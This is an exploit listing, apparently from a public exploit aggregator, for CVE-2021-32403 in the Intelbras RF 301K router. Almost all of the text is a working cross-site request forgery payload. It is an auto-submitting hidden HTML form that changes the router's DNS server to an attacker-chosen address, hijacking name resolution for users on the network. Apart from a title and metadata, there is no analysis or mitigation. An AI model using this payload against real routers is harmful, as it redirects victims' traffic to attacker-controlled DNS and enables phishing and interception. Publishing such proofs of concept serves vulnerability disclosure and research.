Exploit for Intelbras Router RF 301K Cross Site Request Forgery CVE-2021-32403

Name: Exploit for Intelbras Router RF 301K Cross Site Request Forgery CVE-2021-32403
Rating: 5 (197 reviews)

2021-06-09 | CVSS 6.8

## https://sploitus.com/exploit?id=PACKETSTORM:163023
# Exploit Title: Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF)  
# Date: 01/05/2021  
# Exploit Author: Rodolfo Mariano  
# Version: Firmware 1.1.2-1.1.5  
# CVE: 2021-32403  
  
# Exploit Code:   
<html>  
<form action="http://10.0.0.1/goform/setSysTools" method="POST">  
<input name="module3" value="lanCfg" type="hidden">  
<input name="lanIP" value="10.0.0.1" type="hidden">  
<input name="lanMask" value="255.255.255.0" type="hidden">  
<input name="dhcpEn" value="true" type="hidden">  
<input name="lanDhcpStartIP" value="10.0.0.100" type="hidden">  
<input name="lanDhcpEndIP" value="10.0.0.200" type="hidden">  
<input name="lanDns1" value="192.168.0.30" type="hidden">  
<input name="lanDns2" value="" type="hidden">  
</form>  
<script>  
document.forms[0].submit();  
</script>  
</html>